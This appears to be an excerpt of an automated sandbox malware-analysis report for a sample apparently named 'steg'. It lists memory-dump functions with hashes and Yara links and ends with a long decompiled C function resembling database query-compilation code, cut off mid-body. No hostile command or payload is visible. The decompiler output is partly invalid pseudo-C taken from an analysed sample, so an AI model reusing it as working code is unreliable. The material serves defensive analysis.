                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f7a98f863dbef16531169b83474bbbfb217cab3a2154cb90c2f87cf9e58f8ba4
                                                                                                                    • Instruction ID: a520ebbd9be5fcb661e25cfc55232206d3458770159f3392d94b3ca284d29d4f
                                                                                                                    • Opcode Fuzzy Hash: f7a98f863dbef16531169b83474bbbfb217cab3a2154cb90c2f87cf9e58f8ba4
                                                                                                                    • Instruction Fuzzy Hash: ECF0A474E00209EFCB14DF99CA8599EFBF9FB48300F1481A99818A7355E730AE51DF81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03371538 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7f617555c4b41f6fc2f73b8c65bd75498fb43a68dc8bc418149937df32e90bdd
                                                                                                                    • Instruction ID: ae297435a29b4bceac54753a522652ca1828e529d127f175a18f3b546c3dfa13
                                                                                                                    • Opcode Fuzzy Hash: 7f617555c4b41f6fc2f73b8c65bd75498fb43a68dc8bc418149937df32e90bdd
                                                                                                                    • Instruction Fuzzy Hash: A6F03030901108EFC714EFB8D95596EBB76EF46211F2021ACD40633350DB30AE54EB59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370748 Relevance: .0, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0fda98e468c6b70488044ecdf5e19eae09734906bb9753982ccbccf543334dad
                                                                                                                    • Instruction ID: 39629583fd2e32a88633350b5975402df639cc7a8a9f5e55a2dbcaf71880a147
                                                                                                                    • Opcode Fuzzy Hash: 0fda98e468c6b70488044ecdf5e19eae09734906bb9753982ccbccf543334dad
                                                                                                                    • Instruction Fuzzy Hash: 17F01574C01308EFCB24EFF8C9445AEBBB5EB06301F2059A9C810A3304D7359A91CF95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03373D18 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7f46549c384bb3b4c6162c9d3af562e98e93fdfa626ecb7dbcc801409d6590fb
                                                                                                                    • Instruction ID: d40814b24dce94e61514cbb5289e474a5589235aed554239439424c5c06de47d
                                                                                                                    • Opcode Fuzzy Hash: 7f46549c384bb3b4c6162c9d3af562e98e93fdfa626ecb7dbcc801409d6590fb
                                                                                                                    • Instruction Fuzzy Hash: ADE04634D0120CEFCB14EFB8C9849ADBBB8EB46210F1011A9C80463351EB30AE94CB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370280 Relevance: .0, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f06139512eafd3bb0f930fdb2b43efd9b0813fb116a7dfe157a147f244ee7b0c
                                                                                                                    • Instruction ID: d3041865f35f908ef0d841c927a155f250520898fe2a7fa0c4bd92249f050d42
                                                                                                                    • Opcode Fuzzy Hash: f06139512eafd3bb0f930fdb2b43efd9b0813fb116a7dfe157a147f244ee7b0c
                                                                                                                    • Instruction Fuzzy Hash: 73E04F74D05308EBCB28DFA8E98459CBBB9EB45301F1051AAC80453301E7749E94DB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0337013E Relevance: .0, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b8caebf1c715fee9b7ff01631c3274af8e36b0f3a4a54952c3f4fa03529e3f59
                                                                                                                    • Instruction ID: 3dc7dd8876d54cf75a51833443f0b0c5d5413c7e1854521b9e8f0901ffef1e28
                                                                                                                    • Opcode Fuzzy Hash: b8caebf1c715fee9b7ff01631c3274af8e36b0f3a4a54952c3f4fa03529e3f59
                                                                                                                    • Instruction Fuzzy Hash: A5D01735D00208CBCB14CFA4E4842ECF774EB8A325F109426C514B3200C3318454CF54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03373CE0 Relevance: .0, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 491bbcb6bbed8996e668aa9c4e59ecfb0e5af048845df7eae1dc45621ebebf0a
                                                                                                                    • Instruction ID: 848cab9c5a52a4bd843208fa02e8c65c1544475ac19281eec666c507f0a234bf
                                                                                                                    • Opcode Fuzzy Hash: 491bbcb6bbed8996e668aa9c4e59ecfb0e5af048845df7eae1dc45621ebebf0a
                                                                                                                    • Instruction Fuzzy Hash: 1ED0C770942209EBC724DFA5D94166AB77DDB43615F1020AD85042324197759E90D6A9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0337011D Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e4fda151d265ee673a3289ecbb47f3113444eab8f11758b93a5a156a9f4ca6f6
                                                                                                                    • Instruction ID: 8aa898889e41756c971302ae8d9ec76d5b7f4957fa2d24affb47a4cbcf14fac3
                                                                                                                    • Opcode Fuzzy Hash: e4fda151d265ee673a3289ecbb47f3113444eab8f11758b93a5a156a9f4ca6f6
                                                                                                                    • Instruction Fuzzy Hash: 94D0C936E01208DF8B108FE8E4404DCF775EB8A225F10A466C514B3300C7329415CF64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03373CDE Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 72088494ee1696a40e8cfab36a9ecc6e9a96c0d412d7a41c4dd00652f39e996b
                                                                                                                    • Instruction ID: 83d7f3b3a8cb0e2408c9be50b9f31bde95ed18ecdf78307783891089c2c82df3
                                                                                                                    • Opcode Fuzzy Hash: 72088494ee1696a40e8cfab36a9ecc6e9a96c0d412d7a41c4dd00652f39e996b
                                                                                                                    • Instruction Fuzzy Hash: 43D0A770802105DBC728DFB0C741629B335EB83205F2020AE840427210C7728F90DB54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00FA2707 Relevance: 14.9, Strings: 11, Instructions: 1119COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E00FA2707(intOrPtr* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed char _v48;
				signed char _v52;
				void _v76;
				char _v84;
				signed int _v88;
				signed char _v92;
				signed char _v96;
				void* _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				signed int _v120;
				signed char _v124;
				intOrPtr _v128;
				signed char _v132;
				intOrPtr _v136;
				signed char _v140;
				signed int _v144;
				signed char _v148;
				signed int _v152;
				signed int* _v156;
				signed char _v160;
				signed char _v164;
				signed char _v168;
				signed char _v172;
				signed char _v176;
				signed int _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t689;
				signed int _t691;
				signed int _t692;
				void* _t696;
				signed int _t699;
				intOrPtr _t700;
				signed int _t701;
				signed char _t702;
				unsigned int _t706;
				signed char _t707;
				signed int _t712;
				void* _t716;
				signed int _t717;
				intOrPtr _t722;
				void* _t728;
				signed char _t730;
				intOrPtr _t738;
				signed char _t740;
				void* _t748;
				signed char _t753;
				signed char _t755;
				signed int _t758;
				intOrPtr _t759;
				signed char _t763;
				intOrPtr _t773;
				signed int _t774;
				signed int _t789;
				signed char _t799;
				signed char _t809;
				signed char _t811;
				signed int _t818;
				intOrPtr _t827;
				signed int _t830;
				signed char _t844;
				signed char _t845;
				signed char _t847;
				intOrPtr _t858;
				signed char _t861;
				signed char _t870;
				signed char _t874;
				void* _t877;
				void* _t883;
				void* _t884;
				void* _t885;
				signed int _t892;
				intOrPtr _t893;
				signed char _t894;
				signed int _t897;
				signed char _t899;
				signed int* _t900;
				signed int* _t904;
				intOrPtr _t905;
				signed int _t915;
				intOrPtr* _t917;
				signed int _t918;
				signed int* _t920;
				void* _t923;
				signed int _t925;
				signed int _t926;
				signed int _t930;
				signed int _t933;
				intOrPtr* _t934;
				signed int _t938;
				signed char _t939;
				signed char _t940;
				signed int _t942;
				signed char _t943;
				signed char _t946;
				signed int _t950;
				signed char _t954;
				signed char _t956;
				signed int _t957;
				signed char _t958;
				signed int _t959;
				short* _t961;
				signed int _t963;
				signed int* _t964;
				signed int _t968;
				intOrPtr* _t969;
				intOrPtr _t971;
				signed int _t972;
				signed char _t974;
				intOrPtr _t977;
				signed int _t981;
				signed int _t982;
				signed int _t983;
				signed int _t984;
				signed char _t985;
				signed int _t986;
				signed char _t987;
				signed char _t990;
				signed char _t998;
				signed char _t1002;
				intOrPtr _t1003;
				signed int* _t1009;
				signed int* _t1011;
				signed int _t1012;
				intOrPtr* _t1013;
				signed char _t1014;
				signed int _t1016;
				signed int* _t1017;
				signed int _t1023;
				intOrPtr* _t1024;
				intOrPtr _t1027;
				signed int _t1028;
				signed int _t1029;
				signed int _t1030;
				intOrPtr _t1031;
				signed int _t1032;
				signed int _t1033;
				void* _t1034;
				void* _t1035;
				void* _t1036;
				void* _t1037;
				void* _t1039;
				void* _t1040;
				void* _t1041;
				void* _t1042;
				void* _t1043;
				void* _t1044;
				void* _t1045;
				void* _t1046;
				void* _t1048;
				void* _t1106;

				_v8 =  *0x481f80 ^ _t1033;
				_t969 = _a4;
				_v112 = _a16;
				_t7 = _t969 + 0x20; // 0x20
				_t1011 = _t7 + (_a8 << 6);
				_v108 = _a20;
				_v136 =  *((intOrPtr*)(_t969 + 0x1c));
				_t1003 =  *_t969;
				_t899 =  *(_t1003 + 0xc);
				_t689 =  *((intOrPtr*)(_t969 + 8)) + ((_t1011[0xa] & 0x000000ff) * 8 - (_t1011[0xa] & 0x000000ff)) * 8 + 8;
				_v100 = _t689;
				_v160 = 0;
				_v128 = _t1003;
				_v176 = _t899;
				_v156 = _t1011;
				_v88 =  *((intOrPtr*)(_t689 + 0x18));
				_v148 =  *_t1011 >> 0x00000019 & 0x00000001;
				if(( *_t1011 & 0x00800000) == 0) {
					L2:
					_v140 = 0;
					L3:
					_t691 = E00FDD1A7(_t899);
					_v124 = _t691;
					_t1011[7] = _t691;
					_t1011[6] = _t691;
					_t692 = E00FDD1A7(_t899);
					_t1035 = _t1034 + 8;
					_v180 = _t692;
					_t1011[8] = _t692;
					if(_t1011[0xa] > 0 && ( *(_v100 + 0x15) & 0x00000008) != 0) {
						_t897 =  *(_t1003 + 0x48) + 1;
						 *(_t1003 + 0x48) = _t897;
						_t1011[3] = _t897;
						E00FD6567(_t899, 0x30, 0, _t897);
						_t1035 = _t1035 + 0x10;
					}
					_t915 =  *_t1011;
					if((_t915 & 0x08000000) == 0) {
						__eflags = _t915 & 0x00001000;
						if((_t915 & 0x00001000) == 0) {
							__eflags = _t915 & 0x00002000;
							if((_t915 & 0x00002000) == 0) {
								__eflags = _t915 & 0x00030000;
								if((_t915 & 0x00030000) == 0) {
									__eflags = _t915 & 0x10000000;
									if((_t915 & 0x10000000) == 0) {
										_t1011[0xa] =  *((intOrPtr*)(_v148 + 0x472bcc));
										_t1011[0xb] = _v88;
										_t696 = E00FD6567(_t899,  *(_v148 + 0x472bd0) & 0x000000ff, _v88, _v124);
										_t1036 = _t1035 + 0x10;
										_t1011[0xc] = _t696 + 1;
										_t1011[0xa] = 1;
										_t1012 = _v88;
										L127:
										_t917 =  *((intOrPtr*)(_v136 + 4));
										_t699 = 0;
										_t971 =  *_t917;
										if(_t971 <= 0) {
											L131:
											asm("xorps xmm0, xmm0");
											asm("movlpd [ebp-0x8c], xmm0");
											_t972 = _v140;
											_t918 = _v144;
											L132:
											_t700 = _v136;
											_v108 = _v108 &  !_t972;
											_t974 =  *(_t700 + 0x14);
											_t1013 =  *((intOrPtr*)(_t700 + 0x1c));
											_v112 = _v112 &  !_t918;
											_v140 = _t974;
											if(_t974 <= 0) {
												L141:
												_t920 = _v156;
												_t701 =  *((intOrPtr*)(_t920 + 0xc));
												_v120 = _t701;
												if(_t701 == 0) {
													L160:
													_t702 = _v160;
													if(_t702 == 0) {
														L167:
														return E00FE72F2(_v112, _t899, _v8 ^ _t1033, _v108, _t1003, _t1013);
													}
													_t899 =  *(_t1003 + 0x15);
													if(_t899 >= 8) {
														goto L167;
													}
													_t1013 = 0;
													_t671 = _t1003 + 0x60; // 0x60
													_t923 = _t671;
													while( *((intOrPtr*)(_t923 + 0x10)) != _t702) {
														_t1013 = _t1013 + 1;
														_t923 = _t923 + 0x18;
														if(_t1013 < 0xa) {
															continue;
														}
														 *(_t1003 + 0x18 + (_t899 & 0x000000ff) * 4) = _t702;
														 *(_t1003 + 0x15) =  *(_t1003 + 0x15) + 1;
														goto L167;
													}
													 *((char*)(_t923 + 9)) = 1;
													goto L167;
												}
												 *(_t920 + 0x24) =  *(_t899 + 0xc);
												_t925 =  *(_t899 + 0xc);
												_t706 =  *(_t899 + 0x10);
												_v140 = _t925;
												if(_t706 > _t925) {
													L154:
													_t707 =  *(_t899 + 0x14);
													 *(_t899 + 0xc) =  *(_t899 + 0xc) + 1;
													_t926 = _t925 + _t925 * 4;
													 *((short*)(_t707 + _t926 * 4)) = 0x30;
													 *((char*)(_t707 + 3 + _t926 * 4)) = 0;
													 *(_t707 + 4 + _t926 * 4) = 1;
													 *((intOrPtr*)(_t707 + 8 + _t926 * 4)) = _v120;
													 *(_t707 + 0xc + _t926 * 4) = 0;
													 *(_t707 + 0x10 + _t926 * 4) = 0;
													 *((char*)(_t899 + 0x6e)) = 0;
													L155:
													E00FC0C57(_t1003);
													_t977 = _v136;
													_t899 = 0;
													_t1013 =  *((intOrPtr*)(_t977 + 0x1c));
													_t1037 = _t1036 + 4;
													if( *((intOrPtr*)(_t977 + 0x14)) <= 0) {
														goto L160;
													} else {
														goto L156;
													}
													do {
														L156:
														if(( *(_t1013 + 0x12) & 0x00000006) == 0 && ( *(_t1013 + 0x20) & _v112 |  *(_t1013 + 0x24) & _v108) == 0) {
															E00FC28B7(_t1003,  *_t1013, _v180, 8);
															_t977 = _v136;
															_t1037 = _t1037 + 0x10;
															 *(_t1013 + 0x12) =  *(_t1013 + 0x12) | 0x00000004;
														}
														_t899 = _t899 + 1;
														_t1013 = _t1013 + 0x28;
													} while (_t899 <  *((intOrPtr*)(_t977 + 0x14)));
													goto L160;
												}
												if(_t706 == 0) {
													_t712 = 0x33;
												} else {
													_t712 = _t706 + _t706;
												}
												_t1014 = E00FBE7D7( *_t899,  *(_t899 + 0x14), _t712 + _t712 * 4 << 2);
												_t1036 = _t1036 + 0xc;
												if(_t1014 == 0) {
													goto L155;
												} else {
													_t716 =  *_t899;
													if(_t716 == 0 || _t1014 <  *((intOrPtr*)(_t716 + 0xe8)) || _t1014 >=  *((intOrPtr*)(_t716 + 0xec))) {
														_t717 =  *0x48182c(_t1014);
														_t1036 = _t1036 + 4;
														_t930 = _t717;
													} else {
														_t930 =  *(_t716 + 0xd8) & 0x0000ffff;
													}
													_t925 = _v140;
													 *(_t899 + 0x10) = 0xcccccccd * _t930 >> 0x20 >> 4;
													 *(_t899 + 0x14) = _t1014;
													goto L154;
												}
											}
											_t900 = _v156;
											do {
												if(( *(_t1013 + 0x12) & 0x00000006) == 0) {
													_t933 =  *(_t1013 + 0x20) & _v112 |  *(_t1013 + 0x24) & _v108;
													if(_t933 == 0) {
														_t722 =  *_t1013;
														if( *((intOrPtr*)(_t900 + 0xc)) == _t933 || ( *(_t722 + 2) & 0x00000001) != 0) {
															E00FC28B7(_t1003, _t722, _v180, 8);
															_t974 = _v140;
															_t1036 = _t1036 + 0x10;
															 *(_t1013 + 0x12) =  *(_t1013 + 0x12) | 0x00000004;
														}
													}
												}
												_t974 = _t974 - 1;
												_t1013 = _t1013 + 0x28;
												_v140 = _t974;
											} while (_t974 > 0);
											_t899 = _v176;
											goto L141;
										}
										_t934 = _t917 + 4;
										while( *_t934 != _t1012) {
											_t699 = _t699 + 1;
											_t934 = _t934 + 4;
											if(_t699 < _t971) {
												continue;
											}
											goto L131;
										}
										asm("bts ecx, eax");
										__eflags = _t699 - 0x20;
										_t981 =  >=  ? 0 : 0;
										_t918 = 0 ^ _t981;
										__eflags = _t699 - 0x40;
										_t972 =  >=  ? _t918 : _t981;
										goto L132;
									}
									 *(_t1003 + 0x48) =  *(_t1003 + 0x48) + 1;
									_v104 =  *(_t1003 + 0x48);
									_v120 = 0;
									_v140 = 0;
									_v168 = E00FDD1A7(_t899);
									_v92 = _t1011[2];
									_t498 =  &_a12;
									 *_t498 = _a12 & 0x00000008;
									__eflags =  *_t498;
									_v84 = 0x10001;
									_t728 = memcpy( &_v76, _v100, 0xe << 2);
									_t1039 = _t1035 + 0x10;
									_t1003 = _v128;
									_v164 = _t728;
									if(__eflags == 0) {
										_t753 =  *(_t1003 + 0x48) + 1;
										__eflags = _t753;
										_t505 = _t753 + 1; // 0x2
										_t943 = _t505;
										_v120 = _t753;
										_v140 = _t943;
										 *(_t1003 + 0x48) = _t943;
										E00FD6567(_t899, 0x77, 0, _t753);
										_t1039 = _t1039 + 0x10;
									}
									_t938 = E00FD6567(_t899, 0x30, 0, _v104);
									_t730 = _v164;
									_t1016 = 0;
									_t1040 = _t1039 + 0x10;
									_v132 = _t938;
									_v152 = 0;
									__eflags =  *(_t730 + 0x14);
									if( *(_t730 + 0x14) <= 0) {
										L119:
										_t982 =  *(_t899 + 0xc);
										__eflags = _t982 - _t938;
										if(_t982 > _t938) {
											 *( *(_t899 + 0x14) + 4 + (_t938 + _t938 * 4) * 4) = _t982;
										}
										_t1017 = _v156;
										E00FD6567(_t899, 0x60, 0,  *((intOrPtr*)(_t1017 + 0x18)));
										_t939 =  *(_t899 + 0x20);
										_t1041 = _t1040 + 0x10;
										__eflags = _t939;
										if(_t939 != 0) {
											_t940 = _t939 - 4 + _v168 * 4;
											__eflags = _t940;
											 *_t940 =  *(_t899 + 0xc);
										}
										 *((char*)(_t1017 + 0x29)) = 0x19;
										 *((intOrPtr*)(_t1017 + 0x2c)) = _v104;
										E00FA5087(_t1017, _v92);
										_t1012 = _v88;
										_t1036 = _t1041 + 8;
										goto L127;
									} else {
										_t983 = _v88;
										do {
											_t738 =  *((intOrPtr*)(_t730 + 0x1c));
											_t942 = _t1016 + _t1016 * 4;
											__eflags =  *((intOrPtr*)(_t738 + 8 + _t942 * 8)) - _t983;
											if( *((intOrPtr*)(_t738 + 8 + _t942 * 8)) == _t983) {
												L112:
												_t740 = E00FDFD97(_t1106, _t1003,  &_v84,  *((intOrPtr*)(_t738 + _t942 * 8)), 0, 0x70);
												_t1040 = _t1040 + 0x14;
												_v124 = _t740;
												__eflags = _t740;
												if(_t740 != 0) {
													__eflags = _a12;
													if(_a12 == 0) {
														__eflags = _v152 -  *((intOrPtr*)(_v164 + 0x14)) - 1;
														_t1018 =  ==  ? 0xffffffff : _t1016;
														_t748 = E00FC1567(_t1003,  *((intOrPtr*)(_v100 + 0xc)), 0xffffffff, _v88, _v140, 0);
														__eflags =  *(_t899 + 0xc) + 2;
														E00FD6647(_t899, 0x71, _v120,  *(_t899 + 0xc) + 2, _t748,  ==  ? 0xffffffff : _t1016, 0xfffffff2);
														_t1016 = _v152;
														_t1040 = _t1040 + 0x34;
													}
													E00FD6567(_t899, 0x2f, _v104, _v168);
													E00FE0667(__eflags, _v124);
													_t1040 = _t1040 + 0x14;
												}
												_t983 = _v88;
												goto L117;
											}
											__eflags =  *((intOrPtr*)(_t738 + 0x10 + _t942 * 8)) - 0x200;
											_t899 = _v176;
											if( *((intOrPtr*)(_t738 + 0x10 + _t942 * 8)) != 0x200) {
												goto L117;
											}
											goto L112;
											L117:
											_t730 = _v164;
											_t1016 = _t1016 + 1;
											_v152 = _t1016;
											__eflags = _t1016 -  *(_t730 + 0x14);
										} while (_t1016 <  *(_t730 + 0x14));
										_t938 = _v132;
										goto L119;
									}
								}
								__eflags = _a12 & 0x00000001;
								_t755 = _t1011[2];
								_t984 = _t1011[1];
								_v92 = _t755;
								_v124 = _t1011[5];
								_t899 = _v176;
								_v52 = 0;
								_v48 = 0;
								_v44 = 0x7a;
								_v40 = 0x36;
								_v36 = 0x7b;
								_v32 = 0x46;
								_v28 = 0x6d;
								_v24 = 0x37;
								_v20 = 0x18;
								_v16 = 0x3f;
								_v12 = 0x29;
								_v96 = _t984;
								_v168 = 0;
								_v132 = 0;
								_v172 = 0;
								_v100 =  *((intOrPtr*)( *((intOrPtr*)(_t755 + 8)) + _t984 * 4));
								if((_a12 & 0x00000001) == 0) {
									L71:
									_t758 = 0;
									__eflags = 0;
									L72:
									__eflags = _t915 & 0x00100000;
									if((_t915 & 0x00100000) != 0) {
										_v172 = E00FA72E7(_t915, _v136, _v88, _v100, _v112, _v108, 0x18, _v92);
										_t1035 = _t1035 + 0x1c;
										_t758 = 1;
									}
									__eflags =  *_t1011 & 0x00200000;
									if(( *_t1011 & 0x00200000) != 0) {
										_v132 = E00FA72E7(_t915, _v136, _v88, _v100, _v112, _v108, 0x24, _v92);
										_t1035 = _t1035 + 0x1c;
										_t758 = 1;
									}
									_push(_t758);
									_push(_v108);
									_push(_v112);
									_push(_v136);
									_push(_t1011);
									_push(_t1003);
									_t759 = E00FA1E67();
									_t985 = _v96;
									_v116 = _t759;
									_v104 = _t1011[7];
									_t1042 = _t1035 + 0x18;
									 *((intOrPtr*)(_t985 +  *((intOrPtr*)(_v92 + 0x28)))) = _v148 - ( *((intOrPtr*)(_t985 +  *((intOrPtr*)(_v92 + 0x28)))) == 0);
									if(_v148 !=  *((intOrPtr*)(_t985 +  *((intOrPtr*)(_v92 + 0x28)))) == 0) {
										_t763 = _v132;
										_t946 = _v172;
									} else {
										_t763 = _v172;
										_t946 = _v132;
										_v172 = _t946;
										_v132 = _t763;
									}
									__eflags = _t763;
									if(_t763 == 0) {
										L81:
										_v100 = 1;
										goto L82;
									} else {
										__eflags =  *(_t763 + 0x10) & 0x00000028;
										_v100 = 0;
										if(( *(_t763 + 0x10) & 0x00000028) == 0) {
											L82:
											__eflags = _t946;
											if(_t946 == 0) {
												L84:
												_v120 = 1;
												L85:
												__eflags = _t763;
												if(_t763 != 0) {
													L87:
													_v152 = 1;
													L88:
													_t947 = _t985;
													_v164 = _t985;
													__eflags = _t763;
													if(_t763 == 0) {
														__eflags = _v168;
														if(_v168 == 0) {
															L93:
															E00FA1FC7(_t1003, _v116, _t947, _v92);
															E00FD6647(_t899,  *((intOrPtr*)(_t1033 + (_v148 + (_v100 + _v152 * 2) * 2) * 4 - 0x30)), _v124, _v104, _v116, _v164, 0xfffffff2);
															_t950 = _v96;
															_t1043 = _t1042 + 0x2c;
															__eflags = _v172;
															_t986 = _t950;
															if(_v172 != 0) {
																E00FC0F57(_t1003, _v116 + _t950);
																E00FC1357(_t1003,  *((intOrPtr*)( *_v172 + 0xc)), _v116 + _t950);
																E00FD6567(_t899, 0x47, _v116 + _t950, _v104);
																_t799 = _v96 + 1;
																__eflags = _t799;
																_v168 = _t799;
																E00FA1FC7(_t1003, _v116, _t799, _v92);
																_t1011 = _v156;
																_t950 = _v96;
																_t986 = _v168;
																_t1043 = _t1043 + 0x34;
															}
															__eflags = _v172;
															_t1011[0xc] =  *(_t899 + 0xc);
															if(_v172 != 0) {
																L97:
																_t950 = 1;
																goto L98;
															} else {
																__eflags = _t950;
																if(_t950 == 0) {
																	L98:
																	_t773 =  *((intOrPtr*)(_t1033 + (_v148 + 1) * _t950 * 4 - 0x10));
																	__eflags = _t773 - 0x18;
																	if(_t773 != 0x18) {
																		E00FD6647(_t899, _t773, _v124, _v104, _v116, _t986, 0xfffffff2);
																		_t789 = _v120;
																		_t789 - _v148 = _t789 != _v148;
																		E00FD6927(_t899, (_t789 & 0xffffff00 | _t789 != _v148) & 0x000000ff);
																		_t1043 = _t1043 + 0x24;
																	}
																	_t774 = E00FC5DF7(_t1003);
																	_t1044 = _t1043 + 4;
																	__eflags =  *_t1011 & 0x00300000;
																	_v120 = _t774;
																	if(( *_t1011 & 0x00300000) != 0) {
																		E00FD65D7(_t899, 3, _v124, _v96, _t774);
																		E00FD6567(_t899, 0x47, _v120, _v180);
																		_t774 = _v120;
																		_t1044 = _t1044 + 0x24;
																	}
																	E00FCE477(_t1003, _t774);
																	E00FA5087(_t1011, _v132);
																	E00FA5087(_t1011, _v172);
																	_t1036 = _t1044 + 0x18;
																	__eflags = _v140;
																	if(_v140 == 0) {
																		_v160 = E00FC5DF7(_t1003);
																		E00FD6567(_t899, 0x39, _v124, _t781);
																		E00FC1177(_t1003, _v88, 0xffffffff, _v160);
																		E00FD6567(_t899, 5, _v88, _v160);
																		_t1036 = _t1036 + 0x34;
																	}
																	__eflags = _v148;
																	_t779 =  !=  ? 0x31 : 0x6a;
																	_t1011[0xa] =  !=  ? 0x31 : 0x6a;
																	_t1011[0xb] = _v124;
																	_t1012 = _v88;
																	goto L127;
																}
																goto L97;
															}
														}
														__eflags = _v116 + _t985;
														E00FD6567(_t899, 0x77, 0, _v116 + _t985);
														_t1042 = _t1042 + 0x10;
														_v100 = 0;
														_v152 = 1;
														L92:
														_t947 = _v96 + 1;
														__eflags = _t947;
														_v164 = _t947;
														goto L93;
													}
													E00FC1357(_t1003,  *((intOrPtr*)( *_t763 + 0xc)), _v116 + _t985);
													E00FD6567(_t899, 0x47, _v116 + _t985, _v104);
													_t1011 = _v156;
													_t1042 = _t1042 + 0x1c;
													goto L92;
												}
												_v152 = _t763;
												__eflags = _t985;
												if(_t985 <= 0) {
													goto L88;
												}
												goto L87;
											}
											__eflags =  *(_t946 + 0x10) & 0x00000028;
											_v120 = 0;
											if(( *(_t946 + 0x10) & 0x00000028) == 0) {
												goto L85;
											}
											goto L84;
										}
										goto L81;
									}
								}
								__eflags = _t915 & "reateTable";
								if((_t915 & "reateTable") == 0) {
									goto L71;
